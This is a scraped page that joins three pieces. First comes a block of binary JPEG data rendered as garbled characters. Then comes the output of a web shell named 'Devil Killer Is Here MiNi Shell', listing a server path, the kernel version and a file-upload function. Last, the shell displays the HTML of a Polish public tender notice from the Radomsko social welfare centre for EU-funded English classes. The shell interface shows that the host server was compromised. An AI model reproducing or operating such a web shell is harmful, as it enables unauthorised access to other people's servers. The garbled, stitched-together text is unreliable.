JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20241107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20241107/0058331601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi w zakresie przeprowadzenia grupowych zajęć <br/>z języka angielskiego dla uczestników projektu „Otwarte drzwi” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W RADOMSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004700786</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Sadowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446832885</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mops-radomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mops-radomsko.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi w zakresie przeprowadzenia grupowych zajęć <br/>z języka angielskiego dla uczestników projektu „Otwarte drzwi” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ccb056c-c6c2-4253-b6b8-1afe11bd9c43</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00583316</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Otwarte drzwi” nr umowy FELD.07.05-IP.01-0110/23-00 współfinansowany ze środków Europejskiego Funduszu Społecznego Plus w ramach Programu Regionalne Fundusze Europejskie dla Łódzkiego 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2ccb056c-c6c2-4253-b6b8-1afe11bd9c43 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu pomiędzy Zamawiającym a Wykonawcami, w zakresie<br/>składania dokumentów, oświadczeń, wniosków z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem:<br/>• Dedykowanego formularza do komunikacji dostępnego w zakładce „Formularze” („Formularze do komunikacji”) na Platformie e-<br/>Zamówienia<br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie<br/>pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości<br/>(przycisk „dodaj załącznik”).<br/>• Poczty elektronicznej na adres e-mail: zamowienia@mops-radomsko.pl (maksymalny rozmiar przesyłanych plików 20 MB)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy e-Zamówienia<br/>jest bezpłatne,<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”,<br/>15.5 Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-<br/>Zamówienia ani logowania,<br/>15.6 Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie.<br/>15.7 Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia, sporządza się w postaci elektronicznej, w formatach<br/>danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych (Zamawiający dopuszcza także<br/>format RAR) i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie<br/>będą miały bezpośredniego zastosowania.<br/>15.8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w ust. 15.7,<br/>przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności (Zamawiający dopuszcza także format RAR) z uwzględnieniem rodzaju przekazywanych danych<br/>(i przekazuje się jako załącznik),<br/>lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>15.9 Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej<br/>konkurencji (Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i<br/>odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa” – dotyczy zarówno etapu składania ofert oraz dokumentów/oświadczeń składanych w toku postępowania o<br/>zamówienie publiczne.<br/>15.13 Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>15.14 Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia -<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>15.15 W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu Infolinia Platformy e-Zamówienia – 22 458 77 99 lub drogą<br/>elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">szczegółowo określa Rozdział 27</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">szczegółowo określa Rozdział 27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NK.2520.13.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa w zakresie przeprowadzenia grupowych zajęć z języka angielskiego dla osób dorosłych - uczestników projektu „Otwarte drzwi” realizowanego w ramach Programu Regionalne Fundusze Europejskie dla Łódzkiego 2021-2027 w ramach działania FELD.07.05 „Integracja i społeczeństwo obywatelskie”, których zadaniem będzie nauka podstawowego słownictwa w języku angielskim, nauka podstawowych form gramatycznych języka angielskiego, ćwiczenia umiejętności mówienia i komunikowania się w języku angielskim oraz inne określone przez Wykonawcę, a wchodzące w zwyczajowy programie nauczania języka angielskiego w zakresie podstawowym, umożliwiającym ewentualną kontynuację nauki w zakresie rozszerzonym.<br/>5.2 Wymagania ogólne dotyczące przedmiotu zamówienia:<br/>5.2.1	Celem wykonania przedmiotu zamówienia jest podniesienie poziomu wiedzy <br/>i umiejętności Uczestników projektu w zakresie mówienia i pisania w języku angielskim oraz zwiększenie ich szans na zatrudnienie.<br/>5.2.2	Uczestnicy zajęć muszą mieć zapewnione wszelkie niezbędne do prowadzenia zajęć materiały. Wykonawca przekaże Uczestnikom na własność niezbędne materiały szkoleniowe oraz zeszyt A-4, długopis oraz harmonogram szkolenia. Komplet materiałów winien zostać przekazany uczestnikom w pierwszym dniu zajęć. <br/>5.2.3	Łącznie w ramach realizacji przedmiotu zamówienia zostanie zrealizowane 480 godzin zegarowych zajęć, średnio około 50 godzin zajęć miesięcznie w okresie realizacji zamówienia.<br/>5.2.4	Uczestnicy projektu „Otwarte drzwi” zostaną podzieleni na 4 grupy liczące po 8-10 osób, z których każda grupa zrealizuje 120 godzin zegarowych zajęć. Zajęcia będą prowadzone z grupami utworzonymi zgodnie z poziomem znajomości języka angielskiego uczestników.<br/>5.2.5	Zamawiający zapewnia dostęp do sali szkoleniowej mieszczącej się na terenie Miejskiego Ośrodka Pomocy Społecznej w Radomsku w której będą odbywać się zajęcia. Sala będzie wyposażona w podstawowy sprzęt szkoleniowy. <br/>5.2.6	Termin realizacji usługi – zajęcia realizowane będą w okresie od daty podpisania umowy do 30 września 2025r.<br/>5.2.7	Miejsce realizacji zajęć, wszelkie dokumenty wydawane przez Wykonawcę, dotyczące uczestnictwa osób w szkoleniu finansowanym z EFS, winny zawierać informacje o unijnym wkładzie finansowym w realizację zajęć zgodnie z informacjami zawartymi na stronie https://funduszeue.lodzkie.pl/poradnik/zasady-komunikacji-marki-fundusze-europejskie-2021-2027.<br/>5.2.8	Zamawiający wyznaczy swojego przedstawiciela, z którym Wykonawca będzie konsultował realizację poszczególnych zadań. Ustalenie terminu rozpoczęcia zajęć oraz Szczegółowego Harmonogramu nastąpi w porozumieniu z przedstawicielem Zamawiającego i musi uwzględniać rozkład innych zajęć Uczestników Projektu.<br/>5.2.9	Po zakończeniu zajęć Wykonawca wyda uczestnikom zaświadczenia o uczestnictwie. Zaświadczenia winny zawierać informację o unijnym wkładzie finansowym w realizację zajęć oraz w odpowiedni sposób oznakowane.<br/>5.2.10	W przypadku braku możliwości umieszczenia na ww. zaświadczeniach wskazanych informacji oraz logotypów Wykonawca dodatkowo wyda uczestnikom zajęć zaświadczenie o jego ukończeniu zawierające wymagane dane.<br/>5.2.11 Wykonawca jest zobowiązany do:<br/>•	przygotowania konspektu zajęć na 3 dni przed realizacją zadania,<br/>•	wypełniania karty ewidencji czasu pracy,<br/>•	prowadzenia list obecności uczestników zawierających: datę, imię i nazwisko, podpis uczestnika, zakres tematyczny zajęć.<br/>•	współpracy z pracownikami socjalnymi w zakresie monitoringu obecności uczestników Projektu na spotkaniach,<br/>•	przygotowania i przeprowadzenia ankiety ex-ante ex-post, Przeprowadzenia badań ankietowych z uczestnikami projektu przed rozpoczęciem i po zakończeniu wsparcia, oceniających poziom osiągniętych rezultatów<br/>•	sporządzenia sprawozdania końcowego z realizacji zajęć:<br/>a.	ilość osób objętych wsparciem,<br/>b.	liczbę osób, które zakończyły wsparcie.<br/>5.3	Na każdym etapie realizacji zadania, Zamawiający zastrzega sobie prawo do kontroli, w tym prawo wglądu do dokumentów finansowych Wykonawcy, związanych z realizowaną usługą. W tym celu może zażądać od Wykonawcy oraz jego kadry niezbędnych dokumentów i informacji.<br/>5.4	W uzasadnionych przypadkach w trakcie realizacji umowy na wniosek zatwierdzony przez Zamawiającego, Wykonawca może dokonać zmiany osób realizujących umowę na inne, jednakże muszą to być osoby posiadające co najmniej takie same kwalifikacje i doświadczenie, jak poprzednio wskazane osoby, gwarantujące należyte i terminowe prowadzenie zajęć.<br/>5.5	Za szkody nieumyślne wyrządzone przez uczestnika zajęć podczas ich trwania odpowiedzialność ponosi Wykonawca.<br/>5.6	Wykonawca zobowiązuje się do prowadzenia karty czasu pracy (listy obecności) w ramach niniejszego projektu oraz zbiorczej karty czasu pracy w systemie miesięcznym, tj. ewidencji godzin i zadań (dotyczy umów o pracę / mianowania, umów zlecenia oraz umów o dzieło z wyłączeniem umów, w wyniku których następuje wykonanie oznaczonego dzieła, np. raportu z badania czy ekspertyzy) potwierdzającej zaangażowanie we wszystkich formach aktywności zawodowej. Wzór karty czasu pracy i zbiorczej karty czasu pracy przygotowany będzie przez Zamawiającego.<br/>5.7	Łączne zaangażowanie zawodowe Wykonawcy / osób (tj. w ramach stosunku pracy, stosunku cywilnoprawnego i samozatrudnienia) w realizację wszystkich projektów finansowanych z funduszy strukturalnych i Funduszu Spójności oraz działań finansowanych z innych źródeł, innych podmiotów nie może przekraczać 276 godzin miesięcznie. Wykonawca zobowiązuje się do niezwłocznego powiadomienia Zamawiającego o każdej zmianie zaangażowania w realizację projektów.<br/>5.8	Wykonawca zobowiązany będzie do ochrony danych osobowych uczestników zajęć oraz Zamawiającego, a także ochrony innych informacji przekazanych mu przez Zamawiającego, a koniecznych do realizacji przedmiotu umowy. Na Wykonawcy ciąży obowiązek stosowania wszelkich formalności, procedur, zabezpieczeń w ww. zakresie, przewidzianych przepisami ustawy o ochronie danych osobowych i dostępie do informacji publicznej.<br/>5.9	Wykonawca zapewnia wysoką jakość usługi, wysokie kwalifikacje osób realizujących umowę oraz zapewnia, że osoba prowadząca zajęcia będzie odpowiadała na indywidualne potrzeby uczestników zajęć.<br/>5.10	Wszelkie należności wynikające z umowy Zamawiającego z Wykonawcą objęte są zakazem sprzedaży oraz cesji wierzytelności (w tym również odsetek) i nie mogą być przelane na rzecz osób trzecich bez zgody Zamawiającego.<br/>5.11	Podane w SWZ ilości osób (uczestników zajęć) są maksymalnymi wielkościami orientacyjnymi i mogą ulec zmianie (zmniejszeniu) w trakcie trwania umowy. Zamawiający zapłaci jedynie za rzeczywistą liczbę grup, w których realizowane będzie wsparcie (zgodnie z zapisami wzoru umowy), a Wykonawcy nie będą przysługiwały żadne roszczenia z tytułu nie przeprowadzenia warsztatów dla maksymalnej ilości grup. <br/>5.12	Wykonawca ponosi odpowiedzialność za wszelkie szkody powstałe w związku<br/>z wykonywaniem przedmiotu zamówienia oraz następstwa nieszczęśliwych wypadków powstałe w związku ze świadczeniem usług. Wykonawca jest zobowiązany do niezwłocznego zawiadomienia w formie pisemnej Zamawiającego o wypadku podczas zajęć, oraz sporządzenia protokołu z wypadku ustalającego okoliczności i przyczyny oraz przekazania go Zamawiającemu i poszkodowanemu.<br/>5.13	Wykonawca zobowiązany jest do realizacji zamówienia zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych, przepisów BHP i ppoż.<br/>5.14	Wykonawca usługi powinien posiadać uprawnienia do wykonywania określonej działalności lub czynności zgodnie z przepisami nakładającymi obowiązek ich posiadania. Osoby realizujące przedmiot zamówienia powinny posiadać niezbędną wiedzę i doświadczenie do wykonywania zadania z zakresu nauki języka angielskiego potwierdzone odpowiednimi zaświadczeniami. <br/>5.15	Zamawiający nie zastrzega obowiązku osobistego wykonania przedmiotu zamówienia przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80580000-3 - Oferowanie kursów językowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium oceny ofert	Waga kryterium<br/>Cena (C)	60,00%<br/>Doświadczenie osób wyznaczonych do realizacji zamówienia (D)	40,00%<br/><br/>21.2 Sposób oceniania ofert:<br/>21.2.1 W kryterium cena (C), w którym zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych (C)	= ----------- x 100 x waga kryterium 60 %<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>60 % – procentowe znaczenie kryterium ceny<br/><br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert nieodrzuconych przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 i wagę kryterium, którą ustalono na 60%.<br/>W przypadku Wykonawcy, który zamierza wykonywać niniejsze zamówienie w ramach umowy zlecenia i dokonać jej rozliczenia na podstawie rachunku do umowy zlecenie (osoby niezamierzające rozliczyć usługi w ramach działalności gospodarczej) zaoferowane wynagrodzenie brutto wskazane w formularzu ofertowym obejmie wszelkie koszty i należności publicznoprawne jakie Zamawiający będzie zobowiązany ponieść w związku z wypłatą wynagrodzenia, co oznacza, że wypłacone wynagrodzenie będzie pomniejszone o należne składki ZUS i inne należności publicznoprawne.<br/>21.2.2	Kryterium Doświadczenie osób wyznaczonych do realizacji zamówienia (D), rozpatrywane zgodnie z danymi podanymi w wykazie osób stanowiącym załącznik nr 8 do SWZ. <br/>Zamawiający oceniał będzie doświadczenie osób wyznaczonych do realizacji zamówienia w przeprowadzaniu zajęć języka angielskiego na podstawie wypełnionego przez wykonawcę załącznika nr 8 oraz załączonych do niego dowodów.<br/>W przypadku osób posiadających doświadczenie w realizacji zajęć języka angielskiego w ramach stosunku pracy przyjmuje się, że wymiar 1 etatu równa się 40 godzinom miesięcznie (liczonych proporcjonalnie w przypadku niepełnego etatu).<br/>Zamawiający zsumuje punkty doświadczenia wykazanych do realizacji usługi osób i podzieli je przez ilość wykazanych osób. Uzyskana wartość będzie brana pod uwagę przy ustalaniu punktacji w kryterium doświadczenie. <br/>Sposób obliczania punktów w kryterium Doświadczenie osób wyznaczonych do realizacji zamówienia będzie następujący: <br/>Posiadanie doświadczenia w przeprowadzaniu zajęć języka angielskiego w latach 2014 do 2024 w wymiarze od 151 godzin do 300 godzin – 10 pkt;<br/>Posiadanie doświadczenia w przeprowadzaniu zajęć języka angielskiego w latach 2014 do 2024w wymiarze od 301 godzin do 450 godzin – 20 pkt;<br/>Posiadanie doświadczenia w przeprowadzaniu zajęć języka angielskiego w latach 2014 do 2024w wymiarze od 451 godzin do 600 godzin – 30 pkt;<br/>Posiadanie doświadczenia w przeprowadzaniu zajęć języka angielskiego w latach 2014 do 2024w wymiarze od 601 – 40 pkt;<br/><br/>Oferta Wykonawcy w kryterium Doświadczenie osób wyznaczonych do realizacji zamówienia może uzyskać maksymalnie 40 punktów. <br/><br/>21.3	Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów po zsumowaniu punktów w kryterium cena oferty oraz doświadczenie osób wyznaczonych do realizacji zamówienia, obliczoną według wzoru: <br/>P = C + D<br/>21.4	Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>21.5	Maksymalna ilość punktów, jaką może osiągnąć oferta po przeliczeniu ilości punktów przyznanych za oba kryteria oceny wynosi 100 pkt. <br/>21.6	Zamawiający oceniał będzie złożone oferty wyłącznie w oparciu o wskazane powyżej kryteria. <br/>21.7	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej oferty przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, 